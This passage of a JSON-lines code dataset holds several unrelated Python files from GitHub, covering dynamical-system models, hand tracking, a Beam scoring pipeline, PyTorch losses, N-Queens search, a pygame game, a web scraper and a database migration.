[0],\n [1 / self.mass],\n ])\n return B\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray):\n # noqa: D102\n x_dot = (self.A @ np.reshape(x, (-1, 1))\n + self.B @ np.reshape(u, (-1, 1)))\n return np.ravel(x_dot)\n\n\nclass Pendulum(ContinuousDynamicModel):\n \"\"\"Point-mass pendulum with optional damping.\n\n State is ``[angle, angular_velocity]``.\n\n Examples\n --------\n Simulate a pendulum\n\n >>> pend = pykoop.dynamic_models.Pendulum(0.5, 1, 0.6)\n >>> x0 = np.array([np.pi / 2, 0])\n >>> t, x = pend.simulate((0, 1), 1e-3, x0, lambda t: 0)\n \"\"\"\n\n def __init__(self, mass, length, damping=0):\n \"\"\"Instantiate :class:`Pendulum`.\n\n Parameters\n ----------\n mass : float\n Mass (kg).\n length : float\n Length (m).\n damping : float\n Viscous damping (N.m.s/rad).\n \"\"\"\n self.mass = mass\n self.length = length\n self.damping = damping\n\n def f(self, t, x, u):\n # noqa: D102\n theta, theta_dot = x\n x_dot = np.array([\n theta_dot,\n (-self.damping / self.mass / self.length**2 * theta_dot\n - constants.g / self.length * np.sin(theta)),\n ]) + np.array([\n 0,\n 1 / (self.mass * self.length**2),\n ]) * u\n return x_dot\n\n\nclass DuffingOscillator(ContinuousDynamicModel):\n r\"\"\"Duffing oscillator model.\n\n Equation is ``\\ddot{x} + \\delta \\dot{x} + \\beta x + \\alpha x^3 = u(t)``\n where usually ``u(t) = a \\cos(\\omega t)``.\n \"\"\"\n\n def __init__(\n self,\n alpha: float = 1,\n beta: float = -1,\n delta: float = 0.1,\n ) -> None:\n \"\"\"Instantiate :class:`DuffingOscillator`.\n\n Parameters\n ----------\n alpha : float\n Coefficient of cubic term.\n beta : float\n Coefficient of linear term.\n delta : float\n Coefficient of first derivative.\n \"\"\"\n self.alpha = alpha\n self.beta = beta\n self.delta = delta\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray):\n # noqa: D102\n x_dot = np.array([\n x[1],\n u - self.delta * x[1] - self.beta * x[0] - self.alpha * x[0]**3\n ])\n return x_dot\n\n\nclass DiscreteVanDerPol(DiscreteDynamicModel):\n \"\"\"Van der Pol oscillator.\n\n Examples\n --------\n Simulate Van der Pol oscillator\n\n >>> t_step = 0.1\n >>> vdp = pykoop.dynamic_models.DiscreteVanDerPol(t_step, 2)\n >>> x0 = np.array([1, 0])\n >>> t_range = (0, 10)\n >>> u = 0.01 * np.cos(np.arange(*t_range, t_step))\n >>> t, x = vdp.simulate(t_range, t_step, x0, u)\n \"\"\"\n\n def __init__(self, t_step: float, mu: float) -> None:\n \"\"\"Instantiate :class:`DiscreteVanDerPol`.\n\n Parameters\n ----------\n t_step : float\n Timestep (s)\n mu : float\n Strength of nonlinearity.\n \"\"\"\n self.t_step = t_step\n self.mu = mu\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n # noqa: D102\n x_next = x + self.t_step * np.array(\n [x[1], self.mu * (1 - x[0]**2) * x[1] - x[0] + u])\n return x_next\n","repo_name":"decargroup/pykoop","sub_path":"pykoop/dynamic_models.py","file_name":"dynamic_models.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"}
+{"seq_id":"3890310635","text":"import cv2\nimport mediapipe as mp\n\nmp_hand = mp.solutions.hands\nhands = mp_hand.Hands()\nmp_drawing_utils = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n success, img = cap.read()\n if not success:\n break\n result = hands.process(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n if result.multi_hand_landmarks:\n for hand_landmark in result.multi_hand_landmarks:\n mp_drawing_utils.draw_landmarks(\n img,\n hand_landmark,\n mp_hand.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style()\n )\n for id_landmark, landmark in enumerate(hand_landmark.landmark):\n print(id_landmark, landmark)\n if id_landmark == 0:\n h, w, c = img.shape\n print(h, w)\n cx_0, cy_0 = int(landmark.x*w), int(landmark.y * h)\n elif id_landmark == 1:\n h, w, c = img.shape\n cx_1, cy_1 = int(landmark.x*w), int(landmark.y * h)\n elif id_landmark == 9:\n h, w, c = img.shape\n cx_9, cy_9 = int(landmark.x * w), int(landmark.y * h)\n elif id_landmark == 17:\n h, w, c = img.shape\n cx_17, cy_17 = int(landmark.x * w), int(landmark.y * h)\n\n cv2.line(img, (cx_0, cy_0), (cx_9, cy_9), (255, 0, 0), 5)\n cv2.line(img, (cx_1, cy_1), (cx_17, cy_17), (255, 0, 0), 5)\n\n\n\n # print(result.multi_hand_landmarks)\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"jsli96/ramp1.4_mega2560","sub_path":"haptic-device_mega2560/hand_rec_cv.py","file_name":"hand_rec_cv.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"86748210456","text":"import apache_beam as beam\nfrom apache_beam.options.pipeline_options import (PipelineOptions, SetupOptions) \nimport argparse\n\nOUTPUT_SCHEMA = \"bestdeviceid:STRING, bestdeviceidtype:STRING, offerlevel:INTEGER, score:FLOAT, timestamp:TIMESTAMP\" \n\nOFFERLEVELS = [645570,640602,652131,640737,643902,649216,31454,633602,622270,636785]\n\ndef map_to_dict(x):\n \"\"\n return {\n 'bestdeviceid':x['bestdeviceid'], \n 'bestdeviceidtype':x['bestdeviceidtype'],\n 'offerlevel': x['offerlevel'],\n 'score':x['score'],\n 'timestamp':x['timestamp']}\n\n\nclass ModelInference(beam.DoFn):\n\n def __init__(self, offerlevel_id):\n \n import datetime\n from google.cloud import storage\n import joblib\n \n self._dt = datetime\n \n self._offerlevel = offerlevel_id\n self._bucket = 'pjm-sklearn-models'\n self._filename = f\"ol{offerlevel_id}.joblib\"\n \n _bucket = storage.Client().get_bucket(self._bucket)\n _blob = _bucket.blob(self._filename)\n \n # download to local\n _blob.download_to_filename(self._filename)\n self.model = joblib.load(self._filename)\n\n\n def process(self, element):\n \n pred = self.model.predict_proba([element['visitdata']])[:,1]\n \n return [{\n 'bestdeviceid':element['bestdeviceid'],\n 'bestdeviceidtype':element['bestdeviceidtype'],\n 'offerlevel':int(self._offerlevel),\n 'score':pred[0],\n 'timestamp':self._dt.datetime.now().isoformat()\n }]\n\n\ndef run(argv=None, save_main_session=True):\n\n parser = argparse.ArgumentParser()\n known_args, pipeline_args = parser.parse_known_args(argv)\n\n pipeline_options = PipelineOptions(pipeline_args)\n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n\n with beam.Pipeline(options=pipeline_options) as p:\n source_data = (p \n | 'QueryTable' >> beam.io.Read(\n beam.io.BigQuerySource(\n query=\"\"\"\n select *\n from [dst-mlpipes:pjm_visitdata_sample.universe]\n limit 1000000\n \"\"\")\n )\n )\n\n inferences = []\n for offerlevel in OFFERLEVELS:\n inferences.append(source_data \n | f'Perform Inference OL {offerlevel}' >> beam.ParDo(ModelInference(offerlevel)))\n\n outputs = (\n tuple(inferences)\n | 'Combine outputs' >> beam.Flatten()\n # | 'Map to necessary structure' >> beam.Map(map_to_dict)\n | 'Write' >> beam.io.WriteToBigQuery(\n table='scoring_output',\n dataset='pjm_visitdata_sample',\n project='dst-mlpipes',\n schema=OUTPUT_SCHEMA)\n )\n\nif __name__ == '__main__':\n run()","repo_name":"pmccarthy-dstillery/tfxtesting","sub_path":"dataflow_scoring/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2256081934","text":"import numpy as np\r\n\r\ndef global_connectivity(nb_neurons,probability):\r\n all_neurons_id = np.arange(0,nb_neurons)\r\n all_i = np.repeat(all_neurons_id,nb_neurons)\r\n all_j = np.tile(all_neurons_id,nb_neurons)\r\n chozen_connections = np.random.choice(np.arange(0,nb_neurons**2),int((nb_neurons**2)*probability),replace=False)\r\n i_connect = all_i[chozen_connections]\r\n j_connect = all_j[chozen_connections]\r\n return i_connect,j_connect\r\n\r\ndef strength_assembly(neuron_pool,i_connect,j_connect,prev_strengths,inside_strength):\r\n\r\n new_strengths = prev_strengths\r\n\r\n for i_id in range(len(i_connect)):\r\n i= i_connect[i_id]\r\n j=j_connect[i_id]\r\n if i in neuron_pool and j in neuron_pool:\r\n new_strengths[i_id] = inside_strength\r\n\r\n return new_strengths","repo_name":"Saighi/SelfHealingNetwork","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71703622763","text":"import torch\nimport torch.nn as nn\n\n\nclass CE:\n def __init__(self, model):\n self.model = model\n self.ce = nn.CrossEntropyLoss()\n\n def compute(self, batch):\n seqs, labels = batch\n outputs = self.model(seqs) # B * N\n labels = labels.view(-1).long()\n loss = self.ce(outputs, labels)\n return loss\n\n\nclass BCE:\n def __init__(self, model):\n self.model = model\n self.bce = nn.BCELoss(reduction='none')\n\n def compute(self, batch):\n seqs, labels = batch\n outputs = self.model(seqs) # B * N\n weight = torch.ones(outputs.shape[0]).float().to(outputs.device)\n loss = self.bce(outputs.view(-1), labels.float())\n loss = torch.mean(weight * loss)\n return loss\n","repo_name":"icantnamemyself/FormerTime","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"}
+{"seq_id":"73950601002","text":"#coding=utf-8\n__author__ = 'xuxuan'\nclass Solution(object):\n _numsToRoman=[\n ['','I','II','III','IV','V','VI','VII','VIII','IX','X'],\n ['','X','XX','XXX','XL','L','LX','LXX','LXXX','XC','C'],\n ['','C','CC','CCC','CD','D','DC','DCC','DCCC','CM','M'],\n ['','M','MM','MMM'],\n ]\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n s='0'*(4-len(str(num)))+str(num)\n ntr=self._numsToRoman\n return ntr[3][int(s[0])]+ntr[2][int(s[1])]+ntr[1][int(s[2])]+ntr[0][int(s[3])]","repo_name":"corpsepiges/leetcode","sub_path":"python/012. Integer to Roman.py","file_name":"012. Integer to Roman.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"19"}
+{"seq_id":"37336729604","text":"# ================= Atmospheric CO2 Emissions ===================\r\n\r\n#This program is to show the growth of CO2 Emissions since 1960, when the Mauna Loa records began being published.\r\n#The data has been retrieved and copied from the following website: https://climate.nasa.gov/vital-signs/carbon-dioxide/\r\n# where the data can be downloaded and viewed.\r\n#The objective of this is to show how polynomial regression can look in relation to linear regression.\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\n\r\n# Training set\r\nx_line = [[1960], [1965], [1970], [1975], [1980], [1985], [1990], [1995], [2000], [2005], [2010], [2015],\r\n [2020]] # Year.\r\ny_line = [[316.19], [319.42], [325.13], [330.59], [338.32], [345.88], [354.33], [360.68], [369.67], [380.11], [389.79],\r\n [401.85], [412.43]] # CO2 PPM\r\n\r\n# Testing set\r\nx_poly = [[1960], [1965], [1970], [1975], [1980], [1985], [1990], [1995], [2000], [2005], [2010], [2015],\r\n [2020]] # Year\r\ny_poly = [[316.19], [319.42], [325.13], [330.59], [338.32], [345.88], [354.33], [360.68], [369.67], [380.11], [389.79],\r\n [401.85], [412.43]] # CO2 PPM\r\n\r\n# Train the Linear Regression model and plot a prediction\r\nregressor = LinearRegression()\r\nregressor.fit(x_line, y_line)\r\nxx = np.linspace(1950, 2020, 10)\r\nyy = regressor.predict(xx.reshape(xx.shape[0], 1))\r\nplt.plot(xx, yy)\r\n\r\n# Set the degree of the Polynomial Regression model\r\nquadratic_degree = PolynomialFeatures(degree=2)\r\n\r\n# This preprocessor transforms an input data matrix into a new data matrix of a given degree\r\nx_train_quadratic = quadratic_degree.fit_transform(x_line)\r\nx_test_quadratic = quadratic_degree.transform(x_poly)\r\n\r\n# Train and test the regressor_quadratic model\r\nregressor_quadratic = LinearRegression()\r\nregressor_quadratic.fit(x_train_quadratic, y_line)\r\nxx_quadratic = quadratic_degree.transform(xx.reshape(xx.shape[0], 1))\r\n\r\n# Plot the graph\r\nplt.plot(xx, regressor_quadratic.predict(xx_quadratic), c='r', linestyle='--')\r\nplt.title('Atmospheric Carbon Dioxide Emissions Over 60 Years')\r\nplt.xlabel('Year')\r\nplt.ylabel('CO2 Emissions in Parts Per Million(PPM)')\r\nplt.axis([1950, 2020, 310, 420])\r\nplt.grid(True)\r\nplt.scatter(x_line, y_line)\r\nplt.show()\r\nprint(x_line)\r\nprint(x_train_quadratic)\r\nprint(x_poly)\r\nprint(x_test_quadratic)\r\n\r\n# If you execute the code, you will see that the simple linear regression model is plotted with\r\n# a solid line. The quadratic regression model is plotted with a dashed line and evidently\r\n# the quadratic regression model fits the training data slightly better.\r\n","repo_name":"Bmk19/Atmospheric_CO2Emissions","sub_path":"AtmosphericCO2.py","file_name":"AtmosphericCO2.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71476930922","text":"# Chapter 7, programming exercise 3\n# This program calculates the corresponding \n# grade of an exam score. \n\ndef main():\n print(\"This program will calculate the corresponding grade of an exam score.\\n\")\n try:\n examScore = int(input(\"Enter your exam score: \"))\n except NameError:\n print(\"Please enter a valid number between 0 and 100.\")\n except TypeError:\n print(\"Please enter a valid number between 0 and 100.\")\n except ValueError:\n print(\"Please enter a valid number between 0 and 100.\") \n\n\n if 100 > examScore >= 90:\n grade = \"A\"\n elif 90 > examScore >= 80:\n grade = \"B\"\n elif 80 > examScore >= 70:\n grade = \"C\"\n elif 70 > examScore >= 60:\n grade = \"D\"\n elif 60 > examScore:\n grade = \"F\"\n else:\n print(\"Please enter a valid number between 0 and 100.\")\n \n\n print(\"The corresponding grade of your exam score is \", grade, \".\")\n\nif __name__ == '__main__':\n main()","repo_name":"dashaevsina/HW070172","sub_path":"L05/Chapter 7 Programming exercise 3).py","file_name":"Chapter 7 Programming exercise 3).py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2464169476","text":"from django.contrib.auth.forms import UserCreationForm\n\nfrom django.db import transaction\nfrom django import forms\nfrom .models import User,ReaderProfile,AuthorProfile\nchoise = ((\"READER\",\"Reader\"),(\"AUTHOR\",\"Author\"))\nclass SignupForm(UserCreationForm):\n role = forms.ChoiceField(choices=choise)\n class Meta(UserCreationForm.Meta):\n model = User\n fields = [\"username\",\"email\",\"role\"]\n \n @transaction.atomic\n def save(self):\n user = super().save(commit=False)\n user.role = self.cleaned_data.get('role')\n # if(\"READER\" in self.cleaned_data.get('role')):\n # user.role = (\"READER\",'Reader')\n # else:\n # user.role = (\"AUTHOR\",'Author')\n user.save()\n if(user.role == \"READER\"):\n reader = ReaderProfile.objects.create(user=user)\n reader.save()\n \n elif(user.role == \"AUTHOR\"):\n author = AuthorProfile.objects.create(user=user)\n author.save()\n return user\n","repo_name":"adel5555/libsys","sub_path":"user/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3771861795","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef melon():\n url = 'https://www.melon.com/chart/'\n header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'}\n result = requests.get(url, headers=header)\n soup = BeautifulSoup(result.text, 'html.parser')\n trs = soup.select('#lst50')\n line = []\n for tr in trs:\n rank = tr.select_one('.wrap.t_center').get_text().split('\\n')\n img= 'https:' + tr.select_one('td > div > a> img')['src']\n title = tr.select_one('.ellipsis.rank01>span>a').get_text().split('\\n')\n artist = tr.select_one('.ellipsis.rank02>span>a').get_text()\n song = tr.select_one('.ellipsis.rank03>a').get_text().split('\\n')\n line.append({'순위':rank,'albumImage':img, '곡명':title,'가수':artist,'앨범':song})\n\n return line","repo_name":"qomalq/DataAnalysis-Lecture","sub_path":"07.FlaskWeb/melon_unity.py","file_name":"melon_unity.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"33737340135","text":"import pygame\r\nimport random\r\n\r\n# Color List\r\nBLACK = ( 0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\n\r\nclass Block(pygame.sprite.Sprite):\r\n \"\"\"\r\n Class for ball.\r\n Derives from the \"Sprite\" class in Pygame.\r\n \"\"\"\r\n\r\n def __init__(self, color, width, height):\r\n \"\"\" Constructor: pass in color and x/y position\r\n \"\"\"\r\n\r\n # Call the parent class\r\n super().__init__()\r\n\r\n # Create an image of the block and fill with a color\r\n # Can also be an image\r\n self.image = pygame.Surface([width, height])\r\n self.image.fill(color)\r\n\r\n # Fetch rect that has dimensions of the image\r\n\r\n # Update position of this object by setting values\r\n # of rect.x and rect.y\r\n self.rect = self.image.get_rect()\r\n\r\n def reset_pos(self):\r\n \"\"\" Reset position to the top of the screen at random x location.\r\n Called by update() or main program loop if collision.\r\n \"\"\"\r\n self.rect.y = random.randrange(-300, -20)\r\n self.rect.x = random.randrange(0, screen_width)\r\n\r\n def update(self):\r\n \"\"\" Called each frame.\"\"\"\r\n\r\n # Move block down one pixel\r\n self.rect.y += 1\r\n if self.rect.y > screen_height:\r\n self.reset_pos()\r\n\r\n# Initialize Pygame\r\npygame.init()\r\n\r\n# Set height and width of the screen\r\nscreen_width = 700\r\nscreen_height = 400\r\nscreen = pygame.display.set_mode([screen_width, screen_height])\r\n\r\n# List of Sprites.\r\n# Each block in program is added to this list.\r\n# List is managed by class called 'Group.'\r\nblock_list = pygame.sprite.Group()\r\n\r\n# This is a list of every sprite:\r\n# All blocks and the player block as well.\r\nall_sprites_list = pygame.sprite.Group()\r\n\r\nfor i in range(50):\r\n # This represents a block\r\n block = Block(BLACK, 20, 15)\r\n\r\n # Set a random location for the block\r\n block.rect.x = random.randrange(screen_width)\r\n block.rect.y = random.randrange(screen_height)\r\n\r\n # Add the block to the list of objects\r\n block_list.add(block)\r\n all_sprites_list.add(block)\r\n\r\n# Create a RED player block\r\nplayer = Block(RED, 20, 15)\r\nall_sprites_list.add(player)\r\n\r\n# Loop until user closes window\r\ndone = False\r\n\r\n# Manage how fast screen updates\r\nclock = pygame.time.Clock()\r\n\r\n# Hide mouse cursor\r\npygame.mouse.set_visible(0)\r\n\r\nscore = 0\r\n\r\n# -------- Main Program Loop ---------\r\nwhile not done:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = True\r\n\r\n # Clear the screen\r\n screen.fill(WHITE)\r\n\r\n # Get current position of mouse\r\n pos = pygame.mouse.get_pos()\r\n\r\n # Fetch the x/y coordinates\r\n player.rect.x = pos[0]\r\n player.rect.y = pos[1]\r\n\r\n # Call update() method for all blocks in block_list\r\n block_list.update()\r\n\r\n # Check if player blocks has collided with other blocks\r\n blocks_hit_list = pygame.sprite.spritecollide(player, block_list, False)\r\n\r\n # Check the list of collisions\r\n for block in blocks_hit_list:\r\n score += 1\r\n print(score)\r\n\r\n block.reset_pos()\r\n if score == 100:\r\n print(\"C O N G R A T U L A T I O N S\")\r\n done = True\r\n\r\n # Draw all sprites\r\n all_sprites_list.draw(screen)\r\n\r\n # Limit to 60 frames per second\r\n clock.tick(60)\r\n\r\n # Update screen\r\n pygame.display.flip()\r\n\r\npygame.quit()","repo_name":"allenmattp/Arcade","sub_path":"sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"12207373683","text":"import random\nimport heapq\nimport sys\n\nsys.setrecursionlimit(10000)\n\n\nclass State:\n def __init__(self, queens, steps=0):\n self.queens = queens\n self.gn = steps\n\n def __lt__(self, other):\n return self.gn < other.gn\n\n def __hash__(self):\n return hash(tuple(self.queens))\n\n def __eq__(self, other):\n if isinstance(other, State):\n return self.queens == other.queens\n return False\n @staticmethod\n def random_state(n):\n if not isinstance(n, int):\n raise TypeError(\"n must be an integer\")\n queens = [random.randint(1, n) for _ in range(n)]\n return State(queens)\n\n def IsGoal(self):\n n = len(self.queens)\n for i in range(n):\n for j in range(i + 1, n):\n if self.queens[i] == self.queens[j] or abs(self.queens[i] - self.queens[j]) == j - i:\n return False\n return True\n\n def SuccessorFunction(self):\n states = set()\n n = len(self.queens)\n for i in range(n):\n for j in range(1, n + 1):\n if j != self.queens[i]:\n new_queens = list(self.queens)\n new_queens[i] = j\n successor_state = State(new_queens, self.gn + 1)\n states.add(successor_state)\n return list(states)\n\n def heuristic(self):\n attacks = 0\n n = len(self.queens)\n for i in range(n):\n for j in range(i + 1, n):\n if self.queens[i] == self.queens[j] or abs(self.queens[i] - self.queens[j]) == j - i:\n attacks += 1\n return attacks\n\n def cost(self):\n return self.gn\n\n\ndef BFS(initial_state):\n steps = 0\n FIFO = [(initial_state, 0)]\n visited = {initial_state}\n search_cost = 0\n max_fringe_size = 1\n\n while FIFO:\n state, steps = FIFO.pop(0)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited:\n visited.add(successor_state)\n FIFO.append((successor_state, steps + 1))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(FIFO))\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef DFS(initial_state):\n LIFO = [(initial_state, 0)]\n visited = {initial_state}\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while LIFO:\n state, steps = LIFO.pop()\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited:\n visited.add(successor_state)\n LIFO.append((successor_state, steps + 1))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(LIFO))\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef greedy(initial_state):\n heap = [(initial_state.heuristic(), initial_state)]\n visited = set()\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while heap:\n _, state = heapq.heappop(heap)\n visited.add(state)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited and successor_state not in [s for _, s in heap]:\n heapq.heappush(heap, (successor_state.heuristic(), successor_state))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(heap))\n\n steps += 1\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef Astar(initial_state):\n heap = [(initial_state.heuristic() + initial_state.cost(), initial_state)]\n visited = set()\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while heap:\n _, state = heapq.heappop(heap)\n visited.add(state)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited and successor_state not in [s for _, s in heap]:\n heapq.heappush(heap, (successor_state.heuristic() + successor_state.cost(), successor_state))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(heap))\n\n steps += 1\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef PrintBoard(queens):\n n = len(queens)\n for i in range(n):\n print(' ---' * n)\n for j in range(1, n + 1):\n p = 'Q' if queens[i] == j else ' '\n print('| %s ' % p, end='')\n print('|')\n print(' ---' * n)\n\ndef printinfo(steps, search_cost, max_fringe_size):\n print(\"Total number of steps to reach a solution (solution cost):\", steps)\n print(\"Total number of nodes generated before reaching a solution (search cost):\", search_cost)\n print(\"Maximum size of the frienge:\", max_fringe_size)\n","repo_name":"1hexk/N-Queen-Problem","sub_path":"N_queen_problem.py","file_name":"N_queen_problem.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"7806140946","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017-12-20\n@author: whenever77\nubuntu 14\n\n在训练过程中显示loss图像并进行保存\n\nloss文件格式如下(每行一个值):\n4.578215\n3.984914\n……\n3.718668\n\n使用以下命令运行:\npython show_loss.py '/home/data/pytorch_out/'\n\npng保存形式为 loss_month_day_hours_minutes.png\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport time\nimport sys\n\n\n# dir 为训练目录,即loss.txt所在目录,直接修改为所需路径即可\ndir = \"/home/data/pytorch_out/\"\n\n\n# 如读入有参数,即sys.argv[1]有值\nif len(sys.argv) >= 2:\n try:\n print(\"--------------------------------\")\n print(sys.argv[1].split('/')[-2])\n print(\"--------------------------------\")\n dir = sys.argv[1]\n except BaseException as e:\n print('error:\\t')\n print(e)\nelse:\n print(\"--------------------------------\")\n print(dir.split('/')[-2])\n print(\"--------------------------------\")\n\n\t\n\t\n# 读取loss的路径\npath = os.path.join(dir, 'loss.txt')\n\n# 利用时间作为画图后缀。可在训练过程中随时记录loss图像\ntime_tmp = list(time.localtime())[1:5]\ntime_now = \"_\".join(str(i) for i in time_tmp)\n\n# 如路径有误,print error\ntry:\n dataloss = np.loadtxt(path)\n plt.plot(dataloss)\n save_path = str(dir) + 'loss_' + str(time_now) + '.png'\n plt.savefig(save_path)\n plt.show()\nexcept BaseException as e:\n # print(\"--------------------------------\")\n print('error:\\t')\n print(e)\n\n","repo_name":"whenever77/Python-study","sub_path":"show_loss.py","file_name":"show_loss.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1900205692","text":"\"\"\"empty message\n\nRevision ID: 3a24472d1754\nRevises: 762402052503\nCreate Date: 2021-04-08 04:13:23.757308\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '3a24472d1754'\ndown_revision = '762402052503'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('personajes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('planetas',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('usuarios',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=120), nullable=False),\n sa.Column('last_name', sa.String(length=120), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.Column('password', sa.String(length=80), nullable=False),\n sa.Column('is_active', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('favorites_characters',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('character_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['character_id'], ['personajes.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['usuarios.id'], )\n )\n op.create_table('favorites_planets',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('planet_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['planet_id'], ['planetas.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['usuarios.id'], )\n )\n op.drop_index('email', table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('email', mysql.VARCHAR(length=120), nullable=False),\n sa.Column('password', mysql.VARCHAR(length=80), nullable=False),\n sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False),\n sa.CheckConstraint('(`is_active` in (0,1))', name='user_chk_1'),\n sa.PrimaryKeyConstraint('id'),\n mysql_collate='utf8mb4_0900_ai_ci',\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.create_index('email', 'user', ['email'], unique=True)\n op.drop_table('favorites_planets')\n op.drop_table('favorites_characters')\n op.drop_table('usuarios')\n op.drop_table('planetas')\n op.drop_table('personajes')\n # ### end Alembic commands ###\n","repo_name":"mzunigau/StarWarsAPI-Flask","sub_path":"migrations/versions/3a24472d1754_.py","file_name":"3a24472d1754_.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
